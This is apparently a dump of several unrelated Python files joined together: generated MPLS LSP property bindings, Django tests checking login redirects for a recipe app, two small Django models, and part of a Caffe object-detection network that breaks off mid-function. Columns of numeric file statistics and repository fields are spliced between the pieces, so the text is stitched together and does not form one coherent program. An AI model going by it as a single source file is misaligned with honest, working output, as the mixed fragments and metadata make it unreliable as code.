lsp_extensive = __builtin__.property(_get_lsp_extensive, _set_lsp_extensive)
lsp_debug = __builtin__.property(_get_lsp_debug, _set_lsp_debug)
lsp_name = __builtin__.property(_get_lsp_name, _set_lsp_name)
lsp_name_extensive = __builtin__.property(_get_lsp_name_extensive, _set_lsp_name_extensive)
lsp_name_debug = __builtin__.property(_get_lsp_name_debug, _set_lsp_name_debug)
bypass_lsp = __builtin__.property(_get_bypass_lsp, _set_bypass_lsp)
bypass_lsp_wide = __builtin__.property(_get_bypass_lsp_wide, _set_bypass_lsp_wide)
bypass_lsp_detail = __builtin__.property(_get_bypass_lsp_detail, _set_bypass_lsp_detail)
bypass_lsp_extensive = __builtin__.property(_get_bypass_lsp_extensive, _set_bypass_lsp_extensive)
bypass_lsp_debug = __builtin__.property(_get_bypass_lsp_debug, _set_bypass_lsp_debug)
bypass_lsp_name = __builtin__.property(_get_bypass_lsp_name, _set_bypass_lsp_name)
bypass_lsp_name_extensive = __builtin__.property(_get_bypass_lsp_name_extensive, _set_bypass_lsp_name_extensive)
bypass_lsp_name_debug = __builtin__.property(_get_bypass_lsp_name_debug, _set_bypass_lsp_name_debug)
bypass_lsp_static = __builtin__.property(_get_bypass_lsp_static, _set_bypass_lsp_static)
bypass_lsp_static_wide = __builtin__.property(_get_bypass_lsp_static_wide, _set_bypass_lsp_static_wide)
bypass_lsp_static_detail = __builtin__.property(_get_bypass_lsp_static_detail, _set_bypass_lsp_static_detail)
bypass_lsp_static_extensive = __builtin__.property(_get_bypass_lsp_static_extensive, _set_bypass_lsp_static_extensive)
bypass_lsp_static_debug = __builtin__.property(_get_bypass_lsp_static_debug, _set_bypass_lsp_static_debug)
bypass_lsp_static_name = __builtin__.property(_get_bypass_lsp_static_name, _set_bypass_lsp_static_name)
bypass_lsp_static_name_extensive = __builtin__.property(_get_bypass_lsp_static_name_extensive, _set_bypass_lsp_static_name_extensive)
bypass_lsp_static_name_debug = __builtin__.property(_get_bypass_lsp_static_name_debug, _set_bypass_lsp_static_name_debug)
bypass_lsp_dynamic = __builtin__.property(_get_bypass_lsp_dynamic, _set_bypass_lsp_dynamic)
bypass_lsp_dynamic_wide = __builtin__.property(_get_bypass_lsp_dynamic_wide, _set_bypass_lsp_dynamic_wide)
bypass_lsp_dynamic_detail = __builtin__.property(_get_bypass_lsp_dynamic_detail, _set_bypass_lsp_dynamic_detail)
bypass_lsp_dynamic_extensive = __builtin__.property(_get_bypass_lsp_dynamic_extensive, _set_bypass_lsp_dynamic_extensive)
bypass_lsp_dynamic_debug = __builtin__.property(_get_bypass_lsp_dynamic_debug, _set_bypass_lsp_dynamic_debug)
bypass_lsp_dynamic_name = __builtin__.property(_get_bypass_lsp_dynamic_name, _set_bypass_lsp_dynamic_name)
bypass_lsp_dynamic_name_extensive = __builtin__.property(_get_bypass_lsp_dynamic_name_extensive, _set_bypass_lsp_dynamic_name_extensive)
bypass_lsp_dynamic_name_debug = __builtin__.property(_get_bypass_lsp_dynamic_name_debug, _set_bypass_lsp_dynamic_name_debug)
lsp_input_lsp_name = __builtin__.property(_get_lsp_input_lsp_name, _set_lsp_input_lsp_name)
lsp_input_bypass = __builtin__.property(_get_lsp_input_bypass, _set_lsp_input_bypass)
lsp_input_dynamic = __builtin__.property(_get_lsp_input_dynamic, _set_lsp_input_dynamic)
lsp_input_brief = __builtin__.property(_get_lsp_input_brief, _set_lsp_input_brief)
lsp_input_wide = __builtin__.property(_get_lsp_input_wide, _set_lsp_input_wide)
lsp_input_detail = __builtin__.property(_get_lsp_input_detail, _set_lsp_input_detail)
lsp_input_extensive = __builtin__.property(_get_lsp_input_extensive, _set_lsp_input_extensive)
lsp_input_debug = __builtin__.property(_get_lsp_input_debug, _set_lsp_input_debug)
lsp_input_one = __builtin__.property(_get_lsp_input_one, _set_lsp_input_one)
lsp_input_all = __builtin__.property(_get_lsp_input_all, _set_lsp_input_all)
lsp_input_more = __builtin__.property(_get_lsp_input_more, _set_lsp_input_more)
_pyangbind_elements = {'lsp': lsp, 'lsp_wide': lsp_wide, 'lsp_detail': lsp_detail, 'lsp_extensive': lsp_extensive, 'lsp_debug': lsp_debug, 'lsp_name': lsp_name, 'lsp_name_extensive': lsp_name_extensive, 'lsp_name_debug': lsp_name_debug, 'bypass_lsp': bypass_lsp, 'bypass_lsp_wide': bypass_lsp_wide, 'bypass_lsp_detail': bypass_lsp_detail, 'bypass_lsp_extensive': bypass_lsp_extensive, 'bypass_lsp_debug': bypass_lsp_debug, 'bypass_lsp_name': bypass_lsp_name, 'bypass_lsp_name_extensive': bypass_lsp_name_extensive, 'bypass_lsp_name_debug': bypass_lsp_name_debug, 'bypass_lsp_static': bypass_lsp_static, 'bypass_lsp_static_wide': bypass_lsp_static_wide, 'bypass_lsp_static_detail': bypass_lsp_static_detail, 'bypass_lsp_static_extensive': bypass_lsp_static_extensive, 'bypass_lsp_static_debug': bypass_lsp_static_debug, 'bypass_lsp_static_name': bypass_lsp_static_name, 'bypass_lsp_static_name_extensive': bypass_lsp_static_name_extensive, 'bypass_lsp_static_name_debug': bypass_lsp_static_name_debug, 'bypass_lsp_dynamic': bypass_lsp_dynamic, 'bypass_lsp_dynamic_wide': bypass_lsp_dynamic_wide, 'bypass_lsp_dynamic_detail': bypass_lsp_dynamic_detail, 'bypass_lsp_dynamic_extensive': bypass_lsp_dynamic_extensive, 'bypass_lsp_dynamic_debug': bypass_lsp_dynamic_debug, 'bypass_lsp_dynamic_name': bypass_lsp_dynamic_name, 'bypass_lsp_dynamic_name_extensive': bypass_lsp_dynamic_name_extensive, 'bypass_lsp_dynamic_name_debug': bypass_lsp_dynamic_name_debug, 'lsp_input_lsp_name': lsp_input_lsp_name, 'lsp_input_bypass': lsp_input_bypass, 'lsp_input_dynamic': lsp_input_dynamic, 'lsp_input_brief': lsp_input_brief, 'lsp_input_wide': lsp_input_wide, 'lsp_input_detail': lsp_input_detail, 'lsp_input_extensive': lsp_input_extensive, 'lsp_input_debug': lsp_input_debug, 'lsp_input_one': lsp_input_one, 'lsp_input_all': lsp_input_all, 'lsp_input_more': lsp_input_more, }
| 70.24136
| 1,864
| 0.763148
| 17,860
| 123,976
| 4.954591
| 0.009798
| 0.070585
| 0.055058
| 0.027212
| 0.972347
| 0.954955
| 0.933834
| 0.917707
| 0.896518
| 0.87916
| 0
| 0.000055
| 0.122951
| 123,976
| 1,764
| 1,865
| 70.281179
| 0.813764
| 0.239716
| 0
| 0.53125
| 0
| 0.046336
| 0.348119
| 0.202222
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142241
| false
| 0.298491
| 0.008621
| 0
| 0.255388
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
775aa1ad10bcffa80888b3d6831761ee8e12103a
| 3,615
|
py
|
Python
|
food2/app/tests/test_views.py
|
Sebastien-M/food2
|
70d60fd5b99baa6a91eaa06aa6924f761d9d9725
|
[
"MIT"
] | 1
|
2019-05-09T01:06:29.000Z
|
2019-05-09T01:06:29.000Z
|
food2/app/tests/test_views.py
|
Sebastien-M/food2
|
70d60fd5b99baa6a91eaa06aa6924f761d9d9725
|
[
"MIT"
] | 35
|
2019-05-09T01:07:06.000Z
|
2021-06-10T17:59:49.000Z
|
food2/app/tests/test_views.py
|
Sebastien-M/food2
|
70d60fd5b99baa6a91eaa06aa6924f761d9d9725
|
[
"MIT"
] | 1
|
2020-10-01T04:14:27.000Z
|
2020-10-01T04:14:27.000Z
|
from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.urls import reverse_lazy
class ViewsTestCase(TestCase):
def __init__(self, *args, **kwargs):
super(ViewsTestCase, self).__init__(*args, **kwargs)
self.client = Client()
def setUp(self):
User.objects.create(username='test',
email='mail@test.com',
password='123')
def test_recipe_detail_view_not_logged_in(self):
response = self.client.get(reverse_lazy('recipe-detail', kwargs={'pk': 1}), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_daily_recipe_view_not_logged_in(self):
response = self.client.get(reverse_lazy('daily-recipe'), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_daily_recipe_delete_view_not_logged_in(self):
response = self.client.get(reverse_lazy('daily-recipe-delete', kwargs={'pk': 1}), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_week_menu_view_not_logged_in(self):
response = self.client.get(reverse_lazy('week-menu'), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_define_recipe_view_not_logged_in(self):
response = self.client.get(reverse_lazy('define-recipe'), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list'), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_update_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-update', kwargs={'pk': 1}), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_delete_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-delete', kwargs={'pk': 1}), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_create_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-create'), follow=True)
# redirection lo signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
| 51.642857
| 108
| 0.708714
| 460
| 3,615
| 5.345652
| 0.136957
| 0.084994
| 0.080521
| 0.109801
| 0.856852
| 0.856852
| 0.856852
| 0.856852
| 0.856852
| 0.856852
| 0
| 0.002341
| 0.172891
| 3,615
| 69
| 109
| 52.391304
| 0.820067
| 0.114246
| 0
| 0.382979
| 0
| 0
| 0.110589
| 0.023496
| 0
| 0
| 0
| 0
| 0.382979
| 1
| 0.234043
| false
| 0.021277
| 0.06383
| 0
| 0.319149
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91fdef67f0a2bb9f5a2930374e84bb8b769bac94
| 456
|
py
|
Python
|
app_portfolio_skills/models.py
|
MichaelDoctor/Portfolio
|
41d9104ef6d34f8eb146230b19038b445351c713
|
[
"MIT"
] | null | null | null |
app_portfolio_skills/models.py
|
MichaelDoctor/Portfolio
|
41d9104ef6d34f8eb146230b19038b445351c713
|
[
"MIT"
] | 4
|
2021-06-09T18:02:18.000Z
|
2022-01-13T03:06:24.000Z
|
app_portfolio_skills/models.py
|
MichaelDoctor/Portfolio
|
41d9104ef6d34f8eb146230b19038b445351c713
|
[
"MIT"
] | null | null | null |
from django.db import models
class Language(models.Model):
title = models.CharField(max_length=50)
icon = models.CharField(max_length=100)
class Meta:
ordering = ['id']
def __str__(self):
return self.title
class Framework(models.Model):
title = models.CharField(max_length=50)
icon = models.CharField(max_length=100)
class Meta:
ordering = ['id']
def __str__(self):
return self.title
| 19
| 43
| 0.651316
| 57
| 456
| 5
| 0.403509
| 0.210526
| 0.252632
| 0.336842
| 0.821053
| 0.821053
| 0.821053
| 0.821053
| 0.821053
| 0.821053
| 0
| 0.028902
| 0.241228
| 456
| 23
| 44
| 19.826087
| 0.794798
| 0
| 0
| 0.8
| 0
| 0
| 0.008772
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0.133333
| 0.866667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 12
|
6211db5f98ad924845ac421e101da6f64069fb82
| 44,155
|
py
|
Python
|
remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/DetPoseJoint/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import math
sys.dont_write_bytecode = True
import caffe
from caffe import layers as L
from caffe import params as P
from caffe.proto import caffe_pb2
sys.path.append('../')
from PyLib.LayerParam.MultiBoxLossLayerParam import *
from PyLib.NetLib.ConvBNLayer import *
from PyLib.NetLib.InceptionLayer import *
from PyLib.NetLib.MultiScaleLayer import *
from BaseNet import *
from AddC6 import *
from DetectorHeader import *
from DAP_Param import *
from DAPData import lr_basenet
from mPoseNet_Reduce import *
pose_string='_pose'##########if use pose_string
from PyLib.NetLib.VggNet import VGG16_BaseNet_ChangeChannel
from mPoseNet_ResidualNet import mPoseNet_COCO_ShuffleVariant_PoseFromReconBase_Train
# ##############################################################################
# ------------------------------------------------------------------------------
# Final Network
def DAPNet(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
# BaseNet
use_sub_layers = (6, 7)
num_channels = (144, 288)
output_channels = (128, 0)
channel_scale = 4
add_strs = "_recon"
flag_withparamname=True
net = ResidualVariant_Base_A_base(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1.0, add_strs=add_strs,flag_withparamname=True)
net = ResidualVariant_Base_A_base(net, data_layer=data_layer+pose_string, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1.0, add_strs=add_strs,flag_withparamname=True,pose_string=pose_string)
# Add Conv6
conv6_output = Conv6_Param.get('conv6_output',[])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
out_layer = "conv3_7_recon_relu"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=True,lr_mult=1, decay_mult=1,n_group=1)
featuremap1 = ["pool1_recon","conv2_6_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap1"
UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM2
featuremap2 = ["conv2_6_recon_relu","conv3_7_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap2"
UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM3
c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
featuremap3 = ["conv3_7_recon_relu",c6_layer]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap3"
UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Create SSD Header for SSD1
lr_mult = 1
decay_mult = 1.0
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
lr_mult = 1.0
decay_mult = 1.0
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2,lr_mult=lr_mult, decay_mult=decay_mult)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
